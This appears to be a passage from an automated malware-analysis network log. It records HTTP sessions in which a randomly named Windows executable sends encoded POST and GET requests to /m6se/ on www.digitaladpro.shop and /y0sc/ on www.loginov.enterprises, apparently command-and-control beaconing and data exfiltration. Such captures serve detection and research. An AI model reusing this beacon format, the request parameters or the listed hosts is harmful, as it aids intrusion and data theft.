Nov 11, 2024 08:34:02.778789997 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:34:02 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50047	142.250.184.211	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:08.038638115 CET	805	OUT	POST /m6se/ HTTP/1.1 Host: www.digitaladpro.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.digitaladpro.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.digitaladpro.shop/m6se/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 67 72 6a 79 67 6a 42 7a 4e 65 59 41 4c 6b 31 53 70 32 36 79 42 64 58 45 46 32 6c 79 6b 67 4e 62 70 62 6c 6c 6e 6a 72 77 6b 6c 47 4f 41 65 76 46 31 6f 42 46 78 5a 61 33 66 57 38 45 74 42 4d 41 54 46 49 56 43 79 47 35 78 35 78 58 70 61 4e 59 72 6b 34 49 70 4f 47 63 58 37 67 54 54 42 6c 2f 76 68 34 56 52 6e 4b 67 42 51 73 54 47 42 58 4b 51 79 62 4a 2b 32 56 54 50 39 2b 43 78 68 73 6d 6e 76 73 32 69 45 70 6d 53 36 2f 6b 34 35 42 2f 66 61 63 77 6d 54 6f 4d 4b 6a 62 59 58 4d 4a 67 74 57 35 44 61 71 6d 70 4a 73 64 6c 4a 42 6b 6c 78 63 39 6e 78 6c 52 34 58 48 57 61 41 34 43 51 7a 67 3d 3d Data Ascii: Ir8HUj=grjygjBzNeYALk1Sp26yBdXEF2lykgNbpbllnjrwklGOAevF1oBFxZa3fW8EtBMATFIVCyG5x5xXpaNYrk4IpOGcX7gTTBl/vh4VRnKgBQsTGBXKQybJ+2VTP9+Cxhsmnvs2iEpmS6/k45B/facwmToMKjbYXMJgtW5DaqmpJsdlJBklxc9nxlR4XHWaA4CQzg==
Nov 11, 2024 08:34:08.665965080 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:34:08 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1566 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Nov 11, 2024 08:34:08.666076899 CET	537	IN	Data Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50048	142.250.184.211	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:10.589210987 CET	825	OUT	POST /m6se/ HTTP/1.1 Host: www.digitaladpro.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.digitaladpro.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.digitaladpro.shop/m6se/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 67 72 6a 79 67 6a 42 7a 4e 65 59 41 5a 30 46 53 72 52 4f 79 4a 64 58 48 4c 57 6c 79 75 41 4e 48 70 61 5a 6c 6e 69 76 67 6b 51 57 4f 44 2f 66 46 32 72 5a 46 32 5a 61 33 4c 6d 38 42 6a 68 4d 78 54 46 56 6d 43 79 71 35 78 35 6c 58 70 61 39 59 72 58 51 4c 7a 2b 47 65 66 62 67 52 64 68 6c 2f 76 68 34 56 52 6e 33 37 42 51 6b 54 47 52 6e 4b 51 54 62 4f 69 6d 56 53 48 64 2b 43 37 42 73 69 6e 76 73 51 69 42 49 4e 53 38 37 6b 34 39 52 2f 66 4c 63 7a 38 44 6f 4b 56 7a 61 76 63 66 51 66 6e 46 59 6f 53 36 32 7a 4a 2b 46 5a 49 48 70 2f 67 74 63 77 6a 6c 31 4c 4b 41 66 75 4e 37 2f 5a 6f 75 79 59 41 6f 4b 4c 47 6b 50 4a 30 34 77 57 61 32 35 46 4f 33 49 3d Data Ascii: Ir8HUj=grjygjBzNeYAZ0FSrROyJdXHLWlyuANHpaZlnivgkQWOD/fF2rZF2Za3Lm8BjhMxTFVmCyq5x5lXpa9YrXQLz+GefbgRdhl/vh4VRn37BQkTGRnKQTbOimVSHd+C7BsinvsQiBINS87k49R/fLcz8DoKVzavcfQfnFYoS62zJ+FZIHp/gtcwjl1LKAfuN7/ZouyYAoKLGkPJ04wWa25FO3I=
Nov 11, 2024 08:34:11.163604021 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:34:11 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1566 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Nov 11, 2024 08:34:11.163623095 CET	537	IN	Data Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50049	142.250.184.211	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:13.146527052 CET	10907	OUT	POST /m6se/ HTTP/1.1 Host: www.digitaladpro.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.digitaladpro.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.digitaladpro.shop/m6se/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 67 72 6a 79 67 6a 42 7a 4e 65 59 41 5a 30 46 53 72 52 4f 79 4a 64 58 48 4c 57 6c 79 75 41 4e 48 70 61 5a 6c 6e 69 76 67 6b 54 32 4f 44 4d 48 46 30 4c 6c 46 33 5a 61 33 49 6d 38 41 6a 68 4d 6f 54 46 4d 4f 43 79 33 62 78 37 64 58 71 37 64 59 74 6d 51 4c 6d 75 47 65 54 37 67 51 54 42 6b 6c 76 68 6f 52 52 68 58 37 42 51 6b 54 47 54 50 4b 45 53 62 4f 67 6d 56 54 50 39 2b 4f 78 68 73 47 6e 72 41 75 69 42 45 37 53 4e 48 6b 35 63 39 2f 54 5a 6b 7a 33 44 6f 49 57 7a 61 33 63 66 73 2b 6e 46 30 4f 53 35 71 4e 4a 38 5a 5a 4a 68 59 65 6b 2b 73 59 2b 44 31 49 59 52 37 77 4d 59 76 61 68 35 47 36 47 36 53 41 61 56 50 69 7a 6f 4e 4d 41 56 52 37 54 67 42 79 6e 45 4a 4e 39 52 6d 56 2b 55 41 63 73 33 34 4e 4e 58 41 49 47 55 47 56 36 52 36 36 33 4e 30 71 56 79 33 4a 44 5a 48 6e 38 64 6c 53 78 63 33 6e 44 36 4a 52 64 56 6e 36 5a 43 4c 31 79 33 59 68 6b 36 6d 76 41 64 4e 59 33 64 4c 33 75 4b 71 35 38 49 56 6a 30 79 6a 55 2b 61 68 6f 49 79 39 50 2f 53 69 33 31 58 39 70 62 37 43 79 41 38 49 66 51 68 5a [TRUNCATED] Data Ascii: Ir8HUj=grjygjBzNeYAZ0FSrROyJdXHLWlyuANHpaZlnivgkT2ODMHF0LlF3Za3Im8AjhMoTFMOCy3bx7dXq7dYtmQLmuGeT7gQTBklvhoRRhX7BQkTGTPKESbOgmVTP9+OxhsGnrAuiBE7SNHk5c9/TZkz3DoIWza3cfs+nF0OS5qNJ8ZZJhYek+sY+D1IYR7wMYvah5G6G6SAaVPizoNMAVR7TgBynEJN9RmV+UAcs34NNXAIGUGV6R663N0qVy3JDZHn8dlSxc3nD6JRdVn6ZCL1y3Yhk6mvAdNY3dL3uKq58IVj0yjU+ahoIy9P/Si31X9pb7CyA8IfQhZDuqFASsBCGMmxdDVxeUhYroXgZLoXQdFNwBmPZTbO2lNgUHZ/vSNnvSEA1CwLc0ctngF+YCAqXYirn0/PoaJuM/7wwCdGksMPyswztOiwwvpof/Nu+gOV3Ru43nQUCOdfkEm+KiSNnilV1/7DaJC4YbgYo+fsCssqUUZc2OjmjZx/1l68Mkk9Al64elNQfZMRJzBBEZorkswO9hZNW6oZF7akiA+5ZKp5fcloA3P6AcCAXq2QNKOMl2nFF/2izqkvJhNFBMKaQOkpBuSkww+67/7Os/CWdi5DwuApMszWFpngfBTlDE1nXrFx5fZOkFNJqTbUMBZmxmgeRZBaR5tdnxnTNKzpkqcbWbvXgQCVsp7GJX/HsZUS9+6MjmpOLLjxq2vndFaz5dN1Ev+y+nYp3H9QBJNdg1UDY4Ve9VdMXFvGOsaUO7VVkD04izYf91edCKFTTrSXmERCcSqq3EhckjpQRCXow6Bp/VoNXPfw7l1/jCIN2MGX2D9x0FvP1JeRiBtSdINl86BEsaIIcaaSx1vvndlnlqBs1gRYRDFQY8Zh06rtONJQkO8cZQEfqtaRXOnGkVnFvBKIIrFuimoINVKLs8oVgNeC277ncVLj1L6fKBb9CQPpdfRBX7MVF4rbuMxihtRbyXHnZxjQHcJ/HxCLuvb3ujiXa [TRUNCATED]
Nov 11, 2024 08:34:13.715614080 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:34:13 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1566 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Nov 11, 2024 08:34:13.715629101 CET	537	IN	Data Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50050	142.250.184.211	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:15.694300890 CET	538	OUT	GET /m6se/?Ir8HUj=tpLSjTwEMN9ZKyp9qReDGLLjNHd3g2FWt49InxX861XvXeuMycl54O2gPUIwqUAFUHZpWTTH+IZzoIJ8zXVpnZ2Md6c4WxN9xCYnLA+vBCEiYAXHGzT4+go=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.digitaladpro.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:34:16.272221088 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:34:16 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1721 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Nov 11, 2024 08:34:16.272233963 CET	692	IN	Data Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50051	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:21.645126104 CET	811	OUT	POST /y0sc/ HTTP/1.1 Host: www.loginov.enterprises Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.loginov.enterprises Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.loginov.enterprises/y0sc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 67 4c 31 4b 2f 7a 61 61 2f 56 48 7a 69 70 2f 6a 5a 5a 42 64 61 63 43 4e 48 6d 79 2f 45 4f 49 67 34 49 32 73 56 35 30 50 6f 38 52 54 37 69 54 47 34 6d 70 4f 56 65 65 59 77 72 30 61 54 31 79 77 31 62 4b 74 45 2b 5a 64 35 58 71 79 4a 49 4b 59 72 58 6c 37 4c 6b 4d 69 44 68 74 48 72 51 47 65 69 66 4e 42 77 76 4f 4a 59 5a 73 77 54 6b 52 71 6f 39 42 6b 53 58 34 38 61 78 75 74 55 7a 70 57 6a 6c 70 6f 6e 74 79 58 41 42 43 43 32 38 30 2f 53 38 6d 78 52 5a 49 4a 46 45 68 53 32 79 4d 58 53 4e 46 46 52 4f 54 36 54 6e 67 6d 33 37 6d 6a 73 6d 34 59 30 6e 4b 56 42 6e 4e 39 5a 76 37 57 4e 51 3d 3d Data Ascii: Ir8HUj=gL1K/zaa/VHzip/jZZBdacCNHmy/EOIg4I2sV50Po8RT7iTG4mpOVeeYwr0aT1yw1bKtE+Zd5XqyJIKYrXl7LkMiDhtHrQGeifNBwvOJYZswTkRqo9BkSX48axutUzpWjlpontyXABCC280/S8mxRZIJFEhS2yMXSNFFROT6Tngm37mjsm4Y0nKVBnN9Zv7WNQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50052	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
